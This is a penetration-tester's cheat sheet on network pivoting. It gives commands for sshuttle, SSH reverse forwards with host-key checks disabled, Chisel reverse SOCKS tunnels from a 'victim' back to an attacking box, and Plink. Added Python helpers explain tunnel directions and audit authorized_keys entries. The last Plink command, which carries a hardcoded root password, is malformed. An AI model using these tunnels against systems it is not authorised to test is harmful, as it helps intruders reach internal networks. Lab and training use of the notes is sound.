Network Pivoting

sshuttle

Requires SSH access to the pivot host; the subnet given after the user@host is then routed through that host.

sshuttle -r linux-user@10.200.124.33 10.200.124.30/24

SSH Tunnel

Remote Port Forward

  • Opens listening ports on the SSH server (kali) that are tunnelled back to hosts reachable from the machine running ssh (the pivot)

ssh -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 kali@10.11.0.4
  • Run from the pivot: kali (10.11.0.4) now listens on 1122 and 13306, and those ports are tunnelled to 10.5.5.11 ports 22 and 3306. .11 is the internal host, .4 is kali

Don't Read or Save the Host Key (For Connecting Back to Kali)

-o "UserKnownHostsFile=/dev/null"

Don't Prompt to Confirm the Host Key

-o "StrictHostKeyChecking=no"
ssh -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" kali@10.11.0.4
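
Which end of the tunnel listens and where connections come out is the part of `-R` that is easy to get backwards. The following is an added illustration, not code from any tool: it reads the `-L`/`-R`/`-D` forward specs out of an ssh command line and explains each one, using the command and addresses from the notes above (10.5.5.11 is the internal host, 10.11.0.4 is kali). It also handles the plain `-D` and server-side `-R port` SOCKS forms, which the notes do not use; IPv6 bracket syntax is assumed absent, as in the notes.

```python
"""Say which end of an ssh tunnel listens and where connections come out.

Added illustration for the SSH Tunnel notes; written here, not taken
from any tool.  Reads the -L/-R/-D forward specs from an ssh command
line.  Assumption: IPv4 addresses only (no [::1] bracket syntax).
"""
import shlex
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Forward:
    kind: str                 # "local" (-L), "remote" (-R), "dynamic" (-D), "remote-dynamic" (-R port)
    bind_addr: str            # address the listening socket is bound to
    listen_port: int
    dest_host: Optional[str]  # None for SOCKS forwards (decided per connection)
    dest_port: Optional[int]


def parse_spec(spec: str):
    """Split '[bind:]port:host:hostport' or the SOCKS form '[bind:]port'."""
    parts = spec.split(":")
    if len(parts) in (1, 2):
        bind = parts[0] if len(parts) == 2 else "127.0.0.1"
        return bind, int(parts[-1]), None, None
    if len(parts) in (3, 4):
        bind = parts[0] if len(parts) == 4 else "127.0.0.1"
        return bind, int(parts[-3]), parts[-2], int(parts[-1])
    raise ValueError(f"unrecognised forward spec {spec!r}")


def parse_ssh_forwards(cmdline: str) -> List[Forward]:
    argv = shlex.split(cmdline)
    forwards, i = [], 0
    while i < len(argv):
        tok = argv[i]
        if tok in ("-L", "-R", "-D"):           # "-R spec"
            flag, spec, i = tok, argv[i + 1], i + 2
        elif tok[:2] in ("-L", "-R", "-D"):     # "-Rspec"
            flag, spec, i = tok[:2], tok[2:], i + 1
        else:                                   # any other argument (-o, user@host, ...)
            i += 1
            continue
        bind, port, host, hostport = parse_spec(spec)
        kind = {"-L": "local", "-R": "remote", "-D": "dynamic"}[flag]
        if kind == "remote" and host is None:   # "-R port": SOCKS listener on the server
            kind = "remote-dynamic"
        forwards.append(Forward(kind, bind, port, host, hostport))
    return forwards


def describe(fwd: Forward, client: str, server: str) -> str:
    where = f"{fwd.bind_addr}:{fwd.listen_port}"
    if fwd.kind == "local":
        return f"{client} listens on {where}; connections exit from {server} to {fwd.dest_host}:{fwd.dest_port}"
    if fwd.kind == "remote":
        return f"{server} listens on {where}; connections exit from {client} to {fwd.dest_host}:{fwd.dest_port}"
    if fwd.kind == "dynamic":
        return f"{client} listens on {where} as a SOCKS proxy; each connection exits from {server}"
    return f"{server} listens on {where} as a SOCKS proxy; each connection exits from {client}"


def explain(cmdline: str, client: str = "the pivot host") -> List[str]:
    """One sentence per forward; the ssh server is the last argument ([user@]host)."""
    server = shlex.split(cmdline)[-1].split("@")[-1]
    return [describe(f, client, server) for f in parse_ssh_forwards(cmdline)]


# The command from the notes, as typed on the pivot host that can reach 10.5.5.11.
NOTES_COMMAND = ('ssh -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 '
                 '-o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" kali@10.11.0.4')

if __name__ == "__main__":
    for line in explain(NOTES_COMMAND):
        print(line)
```

The default bind address is shown as 127.0.0.1 because without `GatewayPorts` the `-R` listener on the server is loopback-only, which is why the notes connect to the forwarded ports from kali itself.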

Creating SSH Keys & Rules

mkdir keys
cd keys
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/var/www/.ssh/id_rsa): /tmp/keys/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /tmp/keys/id_rsa.
Your public key has been saved in /tmp/keys/id_rsa.pub.
...
cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxO27JE5uXiHqoUUb4j9o/IPHxsPg+fflPKW4N6pK0ZXSmMfLhjaHyhUr4auF+hSnF2g1hN4N2Z4DjkfZ9f95O7Ox3m0oaUgEwHtZcwTNNLJiHs2fSs7ObLR+gZ23kaJ+TYM8ZIo/ENC68Py+NhtW1c2So95ARwCa/Hkb7kZ1xNo6f6rvCqXAyk/WZcBXxYkGqOLut3c5B+++6h3spOPlDkoPs8T5/wJNcn8i12Lex/d02iOWCLGEav2V1R9xk87xVdI6h5BPySl35+ZXOrHzazbddS7MwGFz16coo+wbHbTR6P5fF9Z1Zm9O/US2LoqHxs7OxNq61BLtr4I/MDnin www-data@ajla

Rules for the Pivot's Key (authorized_keys entry on the host it connects back to)

from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxO27JE5uXiHqoUUb4j9o/IPHxsPg+fflPKW4N6pK0ZXSmMfLhjaHyhUr4auF+hSnF2g1hN4N2Z4DjkfZ9f95O7Ox3m0oaUgEwHtZcwTNNLJiHs2fSs7ObLR+gZ23kaJ+TYM8ZIo/ENC68Py+NhtW1c2So95ARwCa/Hkb7kZ1xNo6f6rvCqXAyk/WZcBXxYkGqOLut3c5B+++6h3spOPlDkoPs8T5/wJNcn8i12Lex/d02iOWCLGEav2V1R9xk87xVdI6h5BPySl35+ZXOrHzazbddS7MwGFz16coo+wbHbTR6P5fF9Z1Zm9O/US2LoqHxs7OxNq61BLtr4I/MDnin www-data@ajla
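
A restricted entry like the one above is only worth having if every option is actually present and the key part is intact (a doubled `ssh-rsa` token, for instance, leaves sshd with a blob it cannot decode). The following audit script is an added example, written here rather than taken from OpenSSH; it follows the authorized_keys format from sshd(8) (optional comma-separated options whose values may be double-quoted and contain commas, then key type, base64 blob and comment), checks that a forwarding-only key carries `from=`, `command=`, `no-pty`, `no-agent-forwarding` and `no-X11-forwarding`, and flags `no-port-forwarding` or a bare `restrict`, either of which would make the `ssh -R` above fail. The entry from the notes is embedded as the sample input.

```python
"""Audit an authorized_keys entry meant for a forwarding-only account.

Added example for the restricted key entry in the notes; written here,
not taken from OpenSSH.  Parses the sshd(8) authorized_keys line format
and lists what is missing or would break port forwarding.
"""
import base64
import struct

KEY_TYPES = (
    "ssh-rsa", "ssh-ed25519", "ssh-dss",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
)
# Options a forwarding-only key should carry (compared case-insensitively).
WANTED = ("from", "command", "no-pty", "no-agent-forwarding", "no-x11-forwarding")

# The entry from the notes (key comment www-data@ajla), used as sample input.
PAGE_LINE = ('from="10.11.1.250",command="echo \'This account can only be used for port forwarding\'",'
             'no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa '
             'AAAAB3NzaC1yc2EAAAADAQABAAABAQCxO27JE5uXiHqoUUb4j9o/IPHxsPg+fflPKW4N6pK0ZXSmMfLhjaHyhUr4auF+hSnF2g1hN4N2Z4DjkfZ9f95O7Ox3m0oaUgEwHtZcwTNNLJiHs2fSs7ObLR+gZ23kaJ+TYM8ZIo/ENC68Py+NhtW1c2So95ARwCa/Hkb7kZ1xNo6f6rvCqXAyk/WZcBXxYkGqOLut3c5B+++6h3spOPlDkoPs8T5/wJNcn8i12Lex/d02iOWCLGEav2V1R9xk87xVdI6h5BPySl35+ZXOrHzazbddS7MwGFz16coo+wbHbTR6P5fF9Z1Zm9O/US2LoqHxs7OxNq61BLtr4I/MDnin '
             'www-data@ajla')


def split_options(text):
    """Split the options field on commas that sit outside double quotes."""
    opts, buf, quoted = [], [], False
    for c in text:
        if c == '"':
            quoted = not quoted
        if c == "," and not quoted:
            opts.append("".join(buf))
            buf = []
        else:
            buf.append(c)
    if buf:
        opts.append("".join(buf))
    return opts


def parse_line(line):
    """Return {'options', 'keytype', 'comment'} or {'error': reason}."""
    line = line.strip()
    if not line or line.startswith("#"):
        return {"error": "blank or comment line"}
    if line.split(None, 1)[0] in KEY_TYPES:        # no options field at all
        options_text, rest = "", line
    else:                                           # options end at the first unquoted space
        quoted, end = False, None
        for i, c in enumerate(line):
            if c == '"':
                quoted = not quoted
            elif c == " " and not quoted:
                end = i
                break
        if end is None:
            return {"error": "options present but no key follows"}
        options_text, rest = line[:end], line[end + 1:]
    fields = rest.split(None, 2)                    # keytype, blob, optional comment
    if len(fields) < 2 or fields[0] not in KEY_TYPES:
        return {"error": f"unrecognised key type {fields[0]!r}"}
    keytype, blob = fields[0], fields[1]
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:                              # binascii.Error is a ValueError
        return {"error": f"key blob {blob[:12]!r}... is not valid base64"}
    # The wire-format blob starts with a length-prefixed copy of the key type.
    if len(raw) < 4 or raw[4:4 + struct.unpack(">I", raw[:4])[0]] != keytype.encode():
        return {"error": "blob does not encode the declared key type"}
    return {"options": split_options(options_text) if options_text else [],
            "keytype": keytype, "comment": fields[2] if len(fields) > 2 else ""}


def audit_forwarding_key(line):
    """List problems with an entry that should only be usable for port forwarding."""
    parsed = parse_line(line)
    if "error" in parsed:
        return [parsed["error"]]
    names = {o.split("=", 1)[0].lower() for o in parsed["options"]}
    findings = [f"missing {w}" for w in WANTED if w not in names]
    if "no-port-forwarding" in names:
        findings.append("no-port-forwarding is set; ssh -R/-L with this key will be refused")
    if "restrict" in names and "port-forwarding" not in names:
        findings.append("restrict without port-forwarding disables forwarding")
    return findings


if __name__ == "__main__":
    print(audit_forwarding_key(PAGE_LINE) or "ok: forwarding-only entry is complete")
```

Run it over the whole file (`for line in open(".ssh/authorized_keys")`) to find entries that were meant to be restricted but lost an option during copy and paste; the `command=` option is what stops an interactive login, since `no-pty` alone still permits commands.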

Chisel

https://github.com/jpillora/chisel

  • Binaries must exist on attacker AND victim (proxy) machine to work

  • proxychains.conf must point at Chisel's SOCKS listener, i.e. `socks5 127.0.0.1 PORT` (PORT is 1080 unless the `socks` remote sets another port), as Chisel serves socks5

Reverse SOCKS Proxy

#Attacking Box (Listener)

./chisel server -p LISTEN_PORT --reverse &

#Victim

./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

Forward SOCKS Proxy

#Victim

./chisel server -p LISTEN_PORT --socks5

#Attacking Box

./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks

Remote Port Forward

#Attacking Machine

./chisel server -p LISTEN_PORT --reverse &

#Victim Machine

./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

Local Port Forward

#Victim Machine

./chisel server -p LISTEN_PORT

#Attacking Machine

./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
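
The four modes above differ only in the remote spec given to `chisel client`, so it is worth being able to read one and say which side listens and where traffic exits. The following is an added example, written here and not part of chisel: it interprets remote specs (`R:` prefix, the `socks` keyword, `/udp` suffix) and derives the proxychains line for SOCKS remotes. The defaults it applies (bind 0.0.0.0, local-port equal to remote-port, remote-host 0.0.0.0 meaning the server's own host, SOCKS listener on 127.0.0.1:1080) are my reading of the chisel README and are assumptions to check against the version in use.

```python
"""Interpret chisel remote specs and derive the matching proxychains line.

Added example for the Chisel notes; written here, not part of chisel.
Defaults (0.0.0.0 bind, local-port = remote-port, socks on
127.0.0.1:1080) are assumptions taken from my reading of the README.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass
class Remote:
    reverse: bool              # "R:" prefix: the chisel *server* side listens
    socks: bool                # listener is a SOCKS5 proxy with no fixed target
    local_host: str
    local_port: int
    remote_host: Optional[str] # None for socks; "0.0.0.0" = the exit side's own host
    remote_port: Optional[int]
    proto: str = "tcp"


def parse_remote(spec: str) -> Remote:
    """Decode '<local-host>:<local-port>:<remote-host>:<remote-port>/<proto>' with defaults."""
    reverse = spec.startswith("R:")
    body = spec[2:] if reverse else spec
    proto = "tcp"
    if "/" in body:
        body, proto = body.rsplit("/", 1)
    parts = body.split(":")
    socks = parts[-1] == "socks"
    if socks:
        parts = parts[:-1]
    local_host = "127.0.0.1" if socks else "0.0.0.0"
    local_port: Optional[int] = 1080 if socks else None
    remote_host: Optional[str] = None if socks else "0.0.0.0"
    remote_port: Optional[int] = None
    remote_host_given = False
    # Fill from the right: numbers go to remote-port then local-port, names to
    # remote-host then local-host.  A socks remote has no remote side at all.
    for part in reversed(parts):
        if part.isdigit():
            if not socks and remote_port is None:
                remote_port = int(part)
            else:
                local_port = int(part)
        elif not socks and not remote_host_given:
            remote_host, remote_host_given = part, True
        else:
            local_host = part
    if not socks:
        if remote_port is None:
            raise ValueError(f"{spec!r}: remote-port is required")
        if local_port is None:
            local_port = remote_port
    return Remote(reverse, socks, local_host, local_port, remote_host, remote_port, proto)


def describe(r: Remote) -> str:
    listener = "chisel server" if r.reverse else "chisel client"
    exit_side = "chisel client" if r.reverse else "chisel server"
    where = f"{r.local_host}:{r.local_port}/{r.proto}"
    if r.socks:
        return f"{listener} listens on {where} as a SOCKS5 proxy; each connection exits from the {exit_side}"
    target = f"localhost on the {exit_side}" if r.remote_host == "0.0.0.0" else r.remote_host
    return f"{listener} listens on {where}; connections exit from the {exit_side} to {target}, port {r.remote_port}"


def proxychains_line(r: Remote) -> str:
    """The proxychains.conf entry for the box where the SOCKS listener lives."""
    if not r.socks:
        raise ValueError("only socks remotes need a proxychains entry")
    return f"socks5 {r.local_host} {r.local_port}"


if __name__ == "__main__":
    # The remote specs used in the notes above, with placeholders filled by constructed values.
    for spec in ("R:socks", "1081:socks", "R:1122:10.5.5.11:22", "8080:10.5.5.11:80"):
        print(f"{spec:22} -> {describe(parse_remote(spec))}")
```

For the reverse SOCKS setup in the notes (`R:socks`) the listener is on the attacking box, so that is where `socks5 127.0.0.1 1080` goes in proxychains.conf; for the forward setup (`PROXY_PORT:socks`) the listener is again on the attacking box, now on PROXY_PORT.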

Plink (Windows)

plink.exe -N -L 0.0.0.0:4444:192.168.119.212:1337 root@KaliIP
plink.exe -ssh -l root -pw toor -R 192.168.119.212:4444
